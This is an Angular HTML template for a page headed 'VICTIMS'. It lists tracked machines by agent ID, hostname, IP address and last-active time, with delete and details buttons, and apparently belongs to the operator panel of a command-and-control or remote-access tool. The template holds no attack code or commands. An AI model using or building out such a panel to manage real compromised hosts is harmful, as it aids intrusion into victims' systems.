<div class="wrapper">
    <div class="header">
      <h1>VICTIMS</h1>
      <div class="search-bar">
        <mat-icon>search</mat-icon>
        <input type="text" placeholder="Search" [(ngModel)]="searchQuery" (ngModelChange)="onSearchChange()" />
      </div>
    </div>

    <div class="container">
      <table>
        <thead>
          <tr>
            <th>#</th>
            <th>Agent ID</th>
            <th>HostName</th>
            <th>IP Address</th>
            <th>Last Active</th>
            <th>Actions</th>
          </tr>
        </thead>
        <tbody>
          @for (victim of filteredVictims$ | async; track victim.id) {
            <tr>
              <td>{{ victim.id }}</td>
              <td>{{ victim.agentId }}</td>
              <td>{{ victim.hostname }}</td>
              <td>{{ victim.ipAddress }}</td>
              <td>{{ victim.lastActive }}</td>
              <td class="actions">
                <button mat-icon-button class="delete-button" (click)="deleteVictim(victim.id)">
                  <mat-icon>delete</mat-icon>
                </button>
                <button mat-icon-button class="details-button" (click)="goToDetails(victim.id)">
                  <mat-icon>assignment_ind</mat-icon>
                </button>
              </td>
            </tr>
          }
        </tbody>
      </table>
    </div>
  </div>
